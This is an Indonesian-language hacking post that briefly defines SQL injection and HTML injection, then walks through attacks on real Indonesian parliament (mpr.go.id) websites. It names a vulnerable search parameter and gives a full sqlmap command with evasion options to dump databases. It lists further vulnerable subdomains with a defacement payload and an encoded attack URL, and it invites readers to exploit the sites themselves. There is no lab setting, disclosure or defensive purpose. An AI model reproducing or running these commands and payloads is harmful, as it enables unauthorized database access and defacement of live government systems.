Apa itu Sql Injection dan HTML Injection??.
SQLI singkatnya adalah teknik yang menyalahgunakan celah yang terjadi dalam lapisan database aplikasi atau website.
HTML Injection sebenarnya masih kakak adek dengan Cross Site Scripting (XSS). yaitu celah keamanan untuk menginjeksi kode HTML ke dalam halaman website...lob loh...buat apa kaka?...(baca: guugel.com)
kemungkinan teman-teman sudah tidak asing dengan method (metode) tersebut, jadi langsung saja tanpa basah basah basi...cokicokicroot.
A. ppid.mpr.go.id SQL Injection
1. akses website :
ppid.mpr.go.id/id
2. arahkan ke url :
https://ppid.mpr.go.id/berita/semuaberita?cari=
3. pastinya kita perlu mencheck respon dari webs tersebut apakah true atau false, dengan memasukan tanda (').
4. Tinggal mengeseks_usi dengan SQLMAP
command sqlmap :
python sqlmap.py -u https://ppid.mpr.go.id/berita/semuaberita?cari=12 --dbs --random-agent --flush-session --technique=BEUS --time-sec=2 --tamper=space2comment --ignore-proxy --dbms=mysql
5. Silahkan mengeseks_usi sendiri...cokicokicroot
B. HTML Injection Domain mpr.go.id
Domain Vulnerable :
1. https://jdih.mpr.go.id/halaman/cari?q=
2. https://www.mpr.go.id/halaman/cari?q=
3. https://v1.mpr.go.id/halaman/cari?q=
4. Injeksi Kodenya
"><marquee><center><font face="courier new" color="green">Ngehek By Ceeroot</font></marquee>"
contoh :
https://www.mpr.go.id/halaman/cari?q=%3Cmarquee%3E%3Ccenter%3E%3Cfont%20face=%22courier%20new%22%20color=%22green%22%3ENgehek%20By%20Ceeroot%3C/font%3E%3C/marquee%3E
Komentar